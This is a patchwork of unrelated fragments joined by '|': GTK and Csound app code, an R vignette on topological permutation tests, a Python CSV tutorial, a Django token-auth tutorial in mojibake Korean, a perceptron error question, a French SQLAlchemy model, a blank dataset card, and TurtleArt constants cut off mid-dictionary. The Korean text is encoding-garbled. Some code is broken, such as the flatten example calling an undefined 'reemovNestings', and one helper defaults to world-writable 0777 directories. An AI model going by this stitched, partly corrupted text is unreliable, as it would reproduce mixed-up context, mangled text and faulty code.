def onDestroy(self, arg2):
if Config.DEBUG: print 'DEBUG: TamTam::onDestroy()'
self.jam.onDestroy()
csnd = new_csound_client()
csnd.connect(False)
csnd.destroy()
gtk.main_quit()
def ensure_dir(self, dir, perms=0777, rw=os.R_OK|os.W_OK):
if not os.path.isdir( dir ):
try:
os.makedirs(dir, perms)
except OSError, e:
print 'ERROR: failed to make dir %s: %i (%s)\n' % (dir, e.errno, e.strerror)
if not os.access(dir, rw):
print 'ERROR: directory %s is missing required r/w access\n' % dir
def read_file(self,file_path):
self.jam.handleJournalLoad(file_path)
def write_file(self,file_path):
self.jam.handleJournalSave(file_path)
|
To learn about the basics of permutation tests and statistical resampling from an excellent textbook, see @resampling-book. For a primer on hypothesis testing with permutation tests in the context of topological data analysis, see @hyptest. Since the distribution of topological features has not been well characterized yet, statistical inference on persistent homology must be nonparametric. Given two sets of data, \(X\) and \(Y\), conventional statistical inference generally involves comparison of the parameters of each population with the following null and alternative hypotheses:
\[ \begin{aligned} H_0&: \mu_X=\mu_Y \ H_A&: \mu_X\neq\mu_Y \end{aligned} \] If we define a function \(T\) that returns the persistent homology of a point cloud, then given two point clouds, \(C\) and \(D\), we can use a permutation test to conduct analogous statistical inference with the following null and alternative hypotheses:
\[\begin{aligned} H_0&:T©=T(D) \ H_A&:T©\neq T(D)\end{aligned}\]TDAstats uses the Wasserstein distance (aka Earth-mover's distance) as a similarity metric between persistent homologies of two point clouds [@wasserstein-calc].Although visual analysis of plots (topological barcodes and persistence diagrams) is essential, a formal statistical procedure adds objectivity to the analysis.The case study below highlights the main features of TDAstats pertaining to statistical inference.For practice, perform the steps of the case study to the unif3d and sphere3d datasets.
unif2d versus circle2d
To ensure that all the code output in this section is reproducible, we set a seed for R's pseudorandom number generator.We are also going to need the unif2d and circle2d datasets provided with TDAstats, so we load them right after setting the seed.
# ensure reproducible results
set.seed(1)
# load TDAstats
library("TDAstats")
# load relevant datasets for case study
data("unif2d")
data("circle2d")
The unif2d dataset is a numeric matrix with 100 rows and 2 columns containing the Cartesian x- and y-coordinates (columns 1 and 2, respectively) for 100 points (1 per row).The points are uniformly distributed within the unit square with corners \((0, 0)\), \((0, 1)\), \((1, 1)\), and \((1, 0)\).We confirm this with the following scatterplot.
# see if points in unif2d are actually distributed
# within a unit square as described above
plot(unif2d, xlab = "x", ylab = "y",
main = "Points in unif2d")
The points do appear uniformly distributed as described above.Next, we take a look at the circle2d dataset, which is also a numeric matrix with 100 rows and 2 columns.However, circle2d contains the Cartesian x- and y-coordinates for 100 points uniformly distributed on the circumference of a unit circle centered at the origin.Like we did with unif2d, we confirm this with a scatterplot.
# see if points in circle2d are actually distributed
# on the circumference of a unit circle as described
plot(circle2d, xlab = "x", ylab = "y",
main = "Points in circle2d")
The points indeed appear to be uniformly distributed on a unit circle.
Before we use a permutation test to see if unif2d and circle2d exhibit distinct persistent homologies, we should take a look at the topological barcodes of each.Since we have 2-dimensional data, we are primarily concerned with the presence of 0-cycles and 1-cycles.If points were connected to each other by edges in a distance-dependent manner, then the resulting graphs (assuming a “good” distance-dependence) for unif2d and circle2d would have a single major component.Thus, we do not expect interesting behavior in the 0-cycles for either dataset.There also does not appear to be a prominent 1-cycle for the points in unif2d.However, the circle2d dataset was intentionally designed to have a single prominent 1-cycle containing all the points in the dataset.Thus, when we plot the topological barcodes for circle2d we should see a persistent 1-cycle that we do not see in the barcode for unif2d.We confirm our expectations with the following code.
# calculate homologies for both datasets
unif.phom <- calculate_homology(unif2d, dim = 1)
circ.phom <- calculate_homology(circle2d, dim = 1)
# plot topological barcodes for both datasets
plot_barcode(unif.phom)
plot_barcode(circ.phom)
We note two aspects of the topological barcodes above: (1) the limits of the horizontal axis are very different making direct comparison difficult; (2) it could be confusing to tell which barcode corresponds to which dataset.To fix these issues and demonstrate how the topological barcodes can be modified with ggplot2 functions (plot_barcode returns a ggplot2 object), we run the following code.
# load ggplot2
library("ggplot2")
# plot barcodes with labels and identical axes
plot_barcode(unif.phom) +
ggtitle("Persistent Homology for unif2d") +
xlim(c(0, 2))
> Scale for 'x' is already present. Adding another scale for 'x', which
> will replace the existing scale.
plot_barcode(circ.phom) +
ggtitle("Persistent Homology for circle2d") +
xlim(c(0, 2))
> Scale for 'x' is already present. Adding another scale for 'x', which
> will replace the existing scale.
We can safely ignore the warnings printed by ggplot2.Rescaling the horizontal axis had two major effects.First, we notice that the 0-cycles which appeared far more persistent for unif2d than for circle2d are now comparable.Second, the 1-cycles in unif2d are not persistent after the rescaling operation.Since the only prominent 1-cycle is now in circle2d, our expectations with respect to the topological barcodes were correct.We can now run a permutation test on the two datasets to confirm that the persistent homologies of the two are, in fact, distinct.To do this, all we have to do is use the permutation_test function in TDAstats, and specify the number of iterations.Increasing the number of iterations improves how well the permutation test approximates the distribution of all point permutations between the two groups, but also comes at the cost of speed.Thus, a number of iterations that is sufficiently large to properly approximate the permutation distribution but not too large to be computed is required.Almost certainly, the ideal number of iterations will change as the available computing power changes.
# run permutation test
perm.test <- permutation_test(unif2d, circle2d, iterations = 100)
# display p-value for 0-cycles
print(perm.test[[1]]$pvalue)
> [1] 0
# display p-value for 1-cycles
print(perm.test[[2]]$pvalue)
> [1] 0
Note that the printed p-values for each set of cycles are unadjusted p-values. To see how p-values can be adjusted for permutation tests, see @resampling-book. You may also want to look at the null distributions generated by the permutation test for each dimension as follows.
# plot null distribution for 0-cycles as histogram
# and add vertical line at Wasserstein distance
# for original groups
hist(perm.test[[1]]$permvals,
xlab = "Wasserstein distance",
ylab = "Counts",
main = "Null distribution for 0-cycles",
xlim = c(0, 2.5))
abline(v = perm.test[[1]]$wasserstein)
# plot null distribution for 1-cycles as histogram
# and add vertical line at Wasserstein distance
# for original groups
hist(perm.test[[2]]$permvals,
xlab = "Wasserstein distance",
ylab = "Counts",
main = "Null distribution for 1-cycles",
xlim = c(0, 2))
abline(v = perm.test[[2]]$wasserstein)
Given that both vertical lines are far right of the plotted histograms (corresponding to the p-values of zero), we can conclude safely that the permutation test has given us sufficient evidence to reject the null hypothesis.Thus, the persistent homologies of unif2d and circle2d appear to be significantly different.
N.B.: persistence diagrams (using the plot_persist function) could replace the topological barcodes above. However, since the vertical and horizontal axes are important in persistence diagrams, the ylim ggplot2 function would also have to be used to rescale axes.
For practice, you can repeat the case study for the unif3d and sphere3d datasets.Keep in mind that the dim parameter in the calculate_homology function would likely have to be changed and that you will have a third permutation distribution generated that would need to be plotted.
|
Jun 142019
Import CSV as Dict
Creates ordered dict
You can increase file size limit
Using next() can bypass the header row
import csv
# Dict reader creates an ordered dict (first row will be headers)
with open('./data/file.csv', newline='') as file:
# Huge csv files might give you a size limit error
csv.field_size_limit(100000000)
results = csv.DictReader(file, delimiter=';', quotechar='*', quoting=csv.QUOTE_ALL)
# next() can help in iterations sometimes
next(results)
for row in results:
# prints each item in the column with header 'key'
print(row['key'])
Import CSV with No Header (nested lists)
newline='' prevents blank lines
csv.reader uses indexes [0], [1]
# newline='' prevents blank lines
with open('./data/file.csv', newline='') as file:
results = csv.reader(file, delimiter=':', quoting=csv.QUOTE_NONE)
for row in results:
# csv reader uses indexes
print(row[0])
Writing and Creating Headers
Create a csv.writer object
Create header manually before loop
Nested lists are better than tuples inside lists
writer.writerow and writer.writerows
# Creates a csv writer object
writer = csv.writer(
file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
# Write header first if you would like
writer.writerow(['title', 'price', 'shipping'])
''' Tuples inside list (list inside lists are usually better though).
If you're using tuples and they are variable size, note that a single tuple
will convert to string type in a loop so indexing it [0] won't work. '''
products = [['slinky', '$5', 'Free'],
['pogo', '$12', '$6'],
['Yoyo', '$7', '$2']]
# write each row normal
for item in products:
writer.writerow(map(str, item))
# Writes all items into a single row
writer.writerow(sum(products, []))
# Writes all 3 rows
writer.writerows(products)
Using DictWriter for Headers
fieldnames indicates header to object
writer.writeheader() writes those fields
# DictWriter field names will add the headers for you when you call writeheader()
with open("./data/file.csv", "w") as file:
writer = csv.DictWriter(
file, fieldnames=['title', 'price', 'shipping'],
quoting=csv.QUOTE_NONNUMERIC)
writer.writeheader()
writer.writerows([['slinky', '$5', 'Free'],
['pogo', '$12', '$6'],
['Yoyo', '$7', '$2']])
Bonus - Flatten any List
Function will flatten any level of nested lists
or type == tuple() to catch tuples too
# -- Bonus (Off Topic) --
# You can flatten any list with type checking and recursion
l = [1, 2, [3, 4, [5, 6]], 7, 8, [9, [10]]]
output = []
def flatten_list(l):
for i in l:
if type(i) == list:
flatten_list(i)
else:
output.append(i)
reemovNestings(l)
Feb 242019
ALTER TABLE product_que ALTER COLUMN attempts TYPE integer USING attempts::integer;
ALTER TABLE product_que ALTER COLUMN amazon TYPE integer USING amazon::integer;
ALTER TABLE product_que ALTER COLUMN ebay TYPE integer USING ebay::integer;
ALTER TABLE product_que ALTER COLUMN etsy TYPE integer USING etsy::integer;
query = self.session.query(db.ProdQue).filter(or_(db.ProdQue.amazon > 0,
db.ProdQue.ebay > 0, db.ProdQue.etsy > 0)).limit(5000)
|
ì¼ë¨ ê¶íì ì¤ì í´ì¼ íëê¹, Djangoë¡ ëììµìë¤.
django-rest-knox ë¼ë í¨í¤ì§ë¥¼ ë¤ì´ë¡ë í´ì¼í©ëë¤.
$ (venv) pip install django-rest-knox
settings.py
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'notes',
'rest_framework',
'knox',
]
...
# ì œì¼ í•˜ë‹¨ì— ì¶”ê°€í•´ì¤ë‹ˆë‹¤.
# 처ìŒì— 10개만 받아오기 위해 PAGE_SIZE를 ì„¤ì •í–ˆìŠµë‹ˆë‹¤.
# ê·¸ë¦¬ê³ ê¸°ë³¸ ê¶Œí•œì„ knoxì˜ tokenì„ ê¸°ë°˜ìœ¼ë¡œ ì„¤ì •í–ˆìŠµë‹ˆë‹¤.
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',
'PAGE_SIZE': 10,
'DEFAULT_AUTHENTICATION_CLASSES': ('knox.auth.TokenAuthentication',),
}
$ (venv) python manage.py makemigrations$ (venv) python manage.py migrate
ì´ì 기본 ê¶íì ì¤ì íì¼ë, notes 모ë¸ìì owner íë를 ì¶ê°í´ì£¼ê² ìµëë¤.
notes/models.py
from django.db import models
from django.contrib.auth.models import User
class Notes(models.Model):
text = models.CharField(max_length=255)
owner = models.ForeignKey(
User, related_name="notes", on_delete=models.CASCADE, null=True
)
created_at = models.DateTimeField(auto_now=False, auto_now_add=True)
def __str__(self):
return self.text
User 모ë¸ì ê°ì ¸ì¨ë¤, foreign keyë¡ ì¤ì íë¤ì.
ê·¸ë¦¬ê³ ëª¨ë¸ì ìì íì¼ë ë¤ìíë² migrate í´ì¤ëë¤.
$ (venv) python manage.py makemigrations$ (venv) python manage.py migrate
views.pyììë 모ë ë ¸í¸ë¥¼ ë¶ë¬ìëê²ì ì´ì ownerë³ë¡ ë¶ë¬ì¤ë ìì ì í´ì£¼ê² ìµëë¤. ê·¸ë¦¬ê³ , ë ¸í¸ë¥¼ ë§ë¤ë, owner íëì ê°ì ë£ì´ì¼ê² ì£ ?
notes/views.py
from rest_framework import viewsets, permissions
from .models import Notes
class NoteViewSet(viewsets.ModelViewSet):
permission_classes = [permissions.IsAuthenticated, ]
serializer_class = NoteSerializer
def get_queryset(self):
return self.request.user.notes.all().order_by("-created_at")
def perform_create(self, serializer):
serializer.save(owner=self.request.user)
ì ì´ì , íìê°ì ë° ë¡ê·¸ì¸ì ëí API 구íì í´ë³´ê² ìµëë¤.
notes/serializers.py
from rest_framework import serializers
from .models import Notes
from django.contrib.auth.models import User
from django.contrib.auth import authenticate
...
# 회ì›ê°€ìž… 시리얼ë¼ì´ì €
class CreateUserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ("id", "username", "password")
extra_kwargs = {"password": {"write_only": True}}
def create(self, validated_data):
user = User.objects.create_user(
validated_data["username"], None, validated_data["password"]
)
return user
# ì ‘ì† ìœ ì§€ì¤‘ì¸ì§€ 확ì¸í• 시리얼ë¼ì´ì €
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ("id", "username")
# ë¡œê·¸ì¸ ì‹œë¦¬ì–¼ë¼ì´ì €
class LoginUserSerializer(serializers.Serializer):
username = serializers.CharField()
password = serializers.CharField()
def validate(self, data):
user = authenticate(**data)
if user and user.is_active:
return user
raise serializers.ValidationError("Unable to log in with provided credentials.")
ììê°ì´ serializer를 ë§ë¤ê³ ,
notes/views.py
from rest_framework import viewsets, permissions, generics
from rest_framework.response import Response
from .models import Notes
from .serializers import (
NoteSerializer,
CreateUserSerializer,
UserSerializer,
LoginUserSerializer,
)
from knox.models import AuthToken
....
class RegistrationAPI(generics.GenericAPIView):
serializer_class = CreateUserSerializer
def post(self, request, *args, **kwargs):
if len(request.data["username"]) < 6 or len(request.data["password"]) < 4:
body = {"message": "short field"}
return Response(body, status=status.HTTP_400_BAD_REQUEST)
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
user = serializer.save()
return Response(
{
"user": UserSerializer(
user, context=self.get_serializer_context()
).data,
"token": AuthToken.objects.create(user),
}
)
class LoginAPI(generics.GenericAPIView):
serializer_class = LoginUserSerializer
def post(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
user = serializer.validated_data
return Response(
{
"user": UserSerializer(
user, context=self.get_serializer_context()
).data,
"token": AuthToken.objects.create(user),
}
)
class UserAPI(generics.RetrieveAPIView):
permission_classes = [permissions.IsAuthenticated]
serializer_class = UserSerializer
def get_object(self):
return self.request.user
serializerë¤ë ë§ë¤ì´ ì¤ëë¤.
notes/urls.py
from django.conf.urls import url
from .views import NoteViewSet, RegistrationAPI, LoginAPI, UserAPI
note_list = NoteViewSet.as_view({"get": "list", "post": "create"})
note_detail = NoteViewSet.as_view(
{"get": "retrieve", "patch": "partial_update", "delete": "destroy"}
)
urlpatterns = [
url("^notes/$", note_list, name="note-list"),
url("^notes/(?P<pk>[0-9]+)/$", note_detail, name="note-detail"),
url("^auth/register/$", RegistrationAPI.as_view()),
url("^auth/login/$", LoginAPI.as_view()),
url("^auth/user/$", UserAPI.as_view()),
]
ì´ë ê² url ë¼ì°í ë í´ì£¼ë©´ ì¥ê³ ìì ì ëì´ë©ëë¤.
postman ìì bodyì raw -> JSONííë¡
{
"username": "testing",
"password": "1234"
}
를 ë£ì´ì£¼ìê³ , http://localhost:8000/api/auth/register/ ì http://localhost:8000/api/auth/login/ ì POST ë°©ìì¼ë¡ ì¤ííë©´ ì ì¤íì´ ë ê²ì ëë¤.
ëí ì ìë ì ì ì 보를 보기 ìí´ìë, http://localhost:8000/api/auth/user/ ë¡ Headers ì Authorization í목ì ë£ê³ token í í°ê° ì¼ë¡ GET ì¤í íë©´ ì ì ì ë³´ê° ë¨ê²ë©ëë¤.
ë§ì§ë§ì¼ë¡ ë¡ê·¸ììì 구ííëê²ì ê°ë¨í©ëë¤.
d_note/urls.py
from django.contrib import admin
from django.urls import path
from notes import urls
from django.conf.urls import include, url
urlpatterns = [
path("admin/", admin.site.urls),
url(r"^api/", include(urls)),
url(r"^api/auth", include("knox.urls")),
]
ë¤ìê³¼ ê°ì´ ì¤ì íë©´, /api/auth/logout/ ì¼ë¡ Authorization: token í í°ê° ì¼ë¡ ì¤ííë©´ ë¡ê·¸ììì´ ë©ëë¤.
본문 ë´ì©ì ë°ë¼íë¤ê° ì¤ë¥ ëë ë¶ë¶ ì ì´ ëìµëë¤.
...
from django.urls import path
...
from django.conf.urls import include, url <--ëì´ì ì¬ì© ìíë 구문
ì´ë¶ë¶ì
from django.urls import path, include
ì´ë ê² íì¤ë¡ ë°ê¾¸ê³ , ìëì urlì ëì´ì ìì°ëê² ë§ìµëë¤. ì ê·ìì ì°ë ¤ë©´ re_path 를 ì¶ê° íìê³ ì°ìë©´ ë©ëë¤.
urlpatterns = [
path("admin/", admin.site.urls),
url(r"^api/", include(urls)),
url(r"^api/auth", include("knox.urls")),
]
ì´ë¶ë¶ì
urlpatterns = [
path("admin/", admin.site.urls),
path("api/", include(urls)),
path("api/auth", include("knox.urls")),
]
ì´ë ê² ìì íìë©´ ë©ëë¤.
|
Hi , I am getting below error when I execute the code in google colab.
0.947265625
---------------------------------------------------------------------------
TypeError Traceback (most recent call last)
<ipython-input-149-3d91d5365e49> in <module>()
----> 1 wt_matrix = perceptron.fit(X_train, Y_train, 10000)
8 frames
/usr/local/lib/python3.6/dist-packages/numpy/core/_asarray.py in asarray(a, dtype, order)
83
84 """
---> 85 return array(a, dtype, copy=False, order=order)
86
87
TypeError: float() argument must be a string or a number, not 'dict_values'
Below is the code
class Perceptron:
def __init__ (self):
self.w = None
self.b = None
def model(self, x):
return 1 if (np.dot(self.w, x) >= self.b) else 0
def predict(self, X):
Y = []
for x in X:
result = self.model(x)
Y.append(result)
return np.array(Y)
def fit(self, X, Y, epochs = 1, lr = 1):
self.w = np.ones(X.shape[1])
self.b = 0
accuracy = {}
max_accuracy = 0
wt_matrix = []
for i in range(epochs):
for x, y in zip(X, Y):
y_pred = self.model(x)
if y == 1 and y_pred == 0:
self.w = self.w + lr * x
self.b = self.b - lr * 1
elif y == 0 and y_pred == 1:
self.w = self.w - lr * x
self.b = self.b + lr * 1
wt_matrix.append(self.w)
accuracy[i] = accuracy_score(self.predict(X), Y)
if (accuracy[i] > max_accuracy):
max_accuracy = accuracy[i]
chkptw = self.w
chkptb = self.b
self.w = chkptw
self.b = chkptb
print(max_accuracy)
plt.plot(accuracy.values())
plt.ylim([0, 1])
plt.show()
return np.array(wt_matrix)
perceptron = Perceptron()
wt_matrix = perceptron.fit(X_train, Y_train, 10000,0.01)
|
NewerOlder
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34
# -*- coding: utf-8 -*-
import enum
from .constants import CHAMBRES, ETAPES, SEXES
from .database import db
class Parlementaire(db.Model):
__tablename__ = 'parlementaires'
id = db.Column(db.Integer, primary_key=True)
nom = db.Column(db.Unicode)
prenom = db.Column(db.Unicode)
sexe = db.Column(db.Enum(*SEXES.keys(), name='sexes'))
adresse = db.Column(db.Unicode)
chambre = db.Column(db.Enum(*CHAMBRES.keys(), name='chambres'))
mandat_debut = db.Column(db.DateTime)
mandat_fin = db.Column(db.DateTime)
num_deptmt = db.Column(db.Integer)
nom_circo = db.Column(db.Unicode)
num_circo = db.Column(db.Integer)
groupe = db.Column(db.Unicode)
groupe_sigle = db.Column(db.Unicode)
url_photo = db.Column(db.Unicode)
url_rc = db.Column(db.Unicode)
url_off = db.Column(db.Unicode)
etat = db.Column(db.Enum(*ETAPES.keys(), name='etapes'))
|
Dataset Card Creation Guide
Table of Contents
Dataset Description
Dataset Structure
Dataset Creation
Considerations for Using the Data
Additional Information
Dataset Description
Homepage:https://sites.google.com/view/sdu-aaai21/shared-task
Repository:https://github.com/amirveyseh/AAAI-21-SDU-shared-task-1-AI
Paper:https://arxiv.org/pdf/2010.14678v1.pdf
Leaderboard:https://competitions.codalab.org/competitions/26609
Point of Contact:[More Information Needed]
Dataset Summary
[More Information Needed]
Supported Tasks and Leaderboards
[More Information Needed]
Languages
[More Information Needed]
Dataset Structure
Data Instances
A sample training set is provided below
{'id': 'TR-0',
'labels': [4, 4, 4, 4, 0, 2, 2, 4, 1, 4, 4, 4, 4, 4, 4, 4, 4, 4],
'tokens': ['What',
'is',
'here',
'called',
'controlled',
'natural',
'language',
'(',
'CNL',
')',
'has',
'traditionally',
'been',
'given',
'many',
'different',
'names',
'.']}
Please note that in test set sentence only id, tokens are available. labels can be ignored for test set.Labels in the test set are all O
Data Fields
[More Information Needed]
Data Splits
[More Information Needed]
Dataset Creation
Curation Rationale
[More Information Needed]
Source Data
[More Information Needed]
Initial Data Collection and Normalization
[More Information Needed]
Who are the source language producers?
[More Information Needed]
Annotations
[More Information Needed]
Annotation process
[More Information Needed]
Who are the annotators?
[More Information Needed]
Personal and Sensitive Information
[More Information Needed]
Considerations for Using the Data
Social Impact of Dataset
[More Information Needed]
Discussion of Biases
[More Information Needed]
Other Known Limitations
[More Information Needed]
Additional Information
Dataset Curators
[More Information Needed]
Licensing Information
[More Information Needed]
Citation Information
[More Information Needed]
|
blob: 54c2d279ff1fdccec38e88478da71db735592584 (
plain
)
# -*- coding: utf-8 -*-
#Copyright (c) 2010-11 Walter Bender
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in
#all copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
#THE SOFTWARE.
from gettext import gettext as _
#
# Sprite layers
#
HIDE_LAYER = 100
CANVAS_LAYER = 500
OVERLAY_LAYER = 525
TURTLE_LAYER = 550
BLOCK_LAYER = 600
CATEGORY_LAYER = 700
TAB_LAYER = 710
STATUS_LAYER = 900
TOP_LAYER = 1000
# Special-case some block colors
BOX_COLORS = {'red': ["#FF0000", "#A00000"],
'orange': ["#FFD000", "#AA8000"],
'yellow': ["#FFFF00", "#A0A000"],
'blue': ["#0000FF", "#000080"],
'cyan': ["#00FFFF", "#00A0A0"],
'green': ["#00FF00", "#008000"],
'purple': ["#FF00FF", "#A000A0"],
'white': ["#FFFFFF", "#A0A0A0"],
'black': ["#000000", "#000000"]}
#
# Misc. parameters
#
PALETTE_HEIGHT = 120
PALETTE_WIDTH = 175
SELECTOR_WIDTH = 55
ICON_SIZE = 55
GRADIENT_COLOR = "#FFFFFF"
STANDARD_STROKE_WIDTH = 1.0
BLOCK_SCALE = [0.5, 1.0, 1.5, 2.0, 3.0, 4.0, 6.0, 8.0]
PALETTE_SCALE = 1.5
DEFAULT_TURTLE = 'Yertle'
DEFAULT_TURTLE_COLORS = ['#008000', '#00A000']
HORIZONTAL_PALETTE = 0
VERTICAL_PALETTE = 1
BLACK = -9999
WHITE = -9998
HIT_HIDE = 248
HIT_SHOW = 240
HIT_RED = "#F80000"
HIT_GREEN = "#00F000"
HIDE_WHITE = "#F8F8F8"
SHOW_WHITE = "#F0F0F0"
DEFAULT_SCALE = 33
XO1 = 'xo1'
XO15 = 'xo1.5'
UNKNOWN = 'unknown'
CONSTANTS = {'leftpos': None, 'toppos': None, 'rightpos': None,
'bottompos': None, 'width': None, 'height': None, 'red': 0,
'orange': 10, 'yellow': 20, 'green': 40, 'cyan': 50, 'blue': 70,
'purple': 90, 'titlex': None, 'titley': None, 'leftx': None,
'topy': None, 'rightx': None, 'bottomy': None}
#
# Blocks that are expandable
#
EXPANDABLE_STYLE = ['boolean-style', 'compare-porch-style', 'compare-style',
'number-style-porch', 'number-style', 'basic-style-2arg']
EXPANDABLE = ['vspace', 'hspace', 'identity2']
EXPANDABLE_ARGS = ['list', 'myfunc1arg', 'myfunc2arg',
'myfunc3arg', 'userdefined', 'userdefined2args',
'userdefined3args']
#
# Blocks that are 'collapsible'
#
COLLAPSIBLE = ['sandwichbottom', 'sandwichcollapsed']
#
# Deprecated block styles that need dock adjustments
#
OLD_DOCK = ['and', 'or', 'plus', 'minus', 'division', 'product', 'remainder']
#
# These blocks get a special skin
#
BLOCKS_WITH_SKIN = ['journal', 'audio', 'description', 'nop', 'userdefined',
'video', 'userdefined2args', 'userdefined3args', 'camera']
PYTHON_SKIN = ['nop', 'userdefined', 'userdefined2args', 'userdefined3args']
#
# Blocks that can interchange strings and numbers for their arguments
#
STRING_OR_NUMBER_ARGS = ['plus2', 'equal2', 'less2', 'greater2', 'box',
'template1x1', 'template1x2', 'template2x1', 'list',
'template2x2', 'template1x1a', 'templatelist', 'nop',
'print', 'stack', 'hat', 'addturtle', 'myfunc',
'myfunc1arg', 'myfunc2arg', 'myfunc3arg', 'comment',
'sandwichtop', 'sandwichtop_no_arm', 'userdefined',
'userdefined2args', 'userdefined3args', 'storein']
CONTENT_ARGS = ['show', 'showaligned', 'push', 'storein', 'storeinbox1',
'storeinbox2']
PREFIX_DICTIONARY = {'journal': '#smedia_', 'description': '#sdescr_',
'audio': '#saudio_', 'video': '#svideo_'}
#
# Status blocks
#
MEDIA_SHAPES = ['audiooff', 'audioon', 'audiosmall',
'videooff', 'videoon', 'videosmall',
'cameraoff', 'camerasmall',
'journaloff', 'journalon', 'journalsmall',
'descriptionoff', 'descriptionon', 'descriptionsmall',
'pythonoff', 'pythonon', 'pythonsmall',
'list', '1x1', '1x1a', '2x1', '1x2', '2x2']
OVERLAY_SHAPES = ['Cartesian', 'Cartesian_labeled', 'polar']
STATUS_SHAPES = ['status', 'info', 'nostack', 'dupstack', 'noinput',
'emptyheap', 'emptybox', 'nomedia', 'nocode', 'overflowerror',
'negroot', 'syntaxerror', 'nofile', 'nojournal', 'zerodivide',
'notanumber', 'incompatible']
#
# Emulate Sugar toolbar when running from outside of Sugar
#
TOOLBAR_SHAPES = ['hideshowoff', 'eraseron', 'run-fastoff',
'run-slowoff', 'debugoff', 'stopiton']
#
# Legacy names
#
OLD_NAMES = {'product': 'product2', 'storeinbox': 'storein', 'minus': 'minus2',
'division': 'division2', 'plus': 'plus2', 'and': 'and2',
'or': 'or2', 'less': 'less2', 'greater': 'greater2',
'equal': 'equal2', 'remainder': 'remainder2',
'identity': 'identity2', 'division': 'division2',
'audiooff': 'audio', 'endfill': 'stopfill',
'descriptionoff': 'description', 'template3': 'templatelist',
'template1': 'template1x1', 'template2': 'template2x1',
'template6': 'template1x2', 'template7': 'template2x2',
'template4': 'template1x1a', 'hres': 'width', 'vres': 'height',
'sandwichtop2': 'sandwichtop', 'image': 'show',
'container': 'indentity2', 'insertimage': 'show'}
#
# Define the relative size and postion of media objects
# (w, h, x, y, dx, dy)
#
TITLEXY = (0.9375, 0.875)
#
# Relative placement of portfolio objects (used by deprecated blocks)
#
TEMPLATES = {'t1x1': (0.5, 0.5, 0.0625, 0.125, 1.05, 0),
't2z1': (0.5, 0.5, 0.0625, 0.125, 1.05, 1.05),
't1x2': (0.45, 0.45, 0.0625, 0.125, 1.05, 1.05),
't2x2': (0.45, 0.45, 0.0625, 0.125, 1.05, 1.05),
't1x1a': (0.9, 0.9, 0.0625, 0.125, 0, 0),
'bullet': (1, 1, 0.0625, 0.125, 0, 0.1),
'insertimage': (0.333, 0.333)}
#
# 'dead key' Unicode dictionaries
#
DEAD_KEYS = ['grave', 'acute', 'circumflex', 'tilde', 'diaeresis', 'abovering']
DEAD_DICTS = [{'A': 192, 'E': 200, 'I': 204, 'O': 210, 'U': 217, 'a': 224,
'e': 232, 'i': 236, 'o': 242, 'u': 249},
{'A': 193, 'E': 201, 'I': 205, 'O': 211, 'U': 218, 'a': 225,
'e': 233, 'i': 237, 'o': 243, 'u': 250},
{'A': 194, 'E': 202, 'I': 206, 'O': 212, 'U': 219, 'a': 226,
'e': 234, 'i': 238, 'o': 244, 'u': 251},
{'A': 195, 'O': 211, 'N': 209, 'U': 360, 'a': 227, 'o': 245,
'n': 241, 'u': 361},
{'A': 196, 'E': 203, 'I': 207, 'O': 211, 'U': 218, 'a': 228,
'e': 235, 'i': 239, 'o': 245, 'u': 252},
{'A': 197, 'a': 229}]
NOISE_KEYS = ['Shift_L', 'Shift_R', 'Control_L', 'Caps_Lock', 'Pause',
'Alt_L', 'Alt_R', 'KP_Enter', 'ISO_Level3_Shift', 'KP_Divide',
'Escape', 'Return', 'KP_Page_Up', 'Up', 'Down', 'Menu',
'Left', 'Right', 'KP_Home', 'KP_End', 'KP_Up', 'Super_L',
'KP_Down', 'KP_Left', 'KP_Right', 'KP_Page_Down', 'Scroll_Lock',
'Page_Down', 'Page_Up']
WHITE_SPACE = ['space', 'Tab']
CURSOR = 'â–ˆ'
RETURN = 'âŽ'
#
# Macros (groups of blocks)
#
MACROS = {
'until':
[[0, 'forever', 0, 0, [None, 2, 1]],
[1, 'vspace', 0, 0, [0, None]],
[2, 'ifelse', 0, 0, [0, None, 3, None, None]],
[3, 'vspace', 0, 0, [2, 4]],
[4, 'stopstack', 0, 0, [3, None]]],
'while':
[[0, 'forever', 0, 0, [None, 2, 1]],
[1, 'vspace', 0, 0, [0, None]],
[2, 'ifelse', 0, 0, [0, None, 3, 4, None]],
[3, 'vspace', 0, 0, [2, None]],
[4, 'stopstack', 0, 0, [2, None]]],
'kbinput':
[[0, 'forever', 0, 0, [None, 1, None]],
[1, 'kbinput', 0, 0, [0, 2]],
[2, 'vspace', 0, 0, [1, 3]],
[3, 'if', 0, 0, [2, 4, 7, 8]],
[4, 'greater2', 0, 0, [3, 5, 6, None]],
[5, 'keyboard', 0, 0, [4, None]],
[6, ['number', '0'], 0, 0, [4, None]],
[7, 'stopstack', 0, 0, [3, None]],
[8, 'vspace', 0, 0, [3, 9]],
[9, 'wait', 0, 0, [8, 10, None]],
[10, ['number', '1'], 0, 0, [9, None]]],
'picturelist':
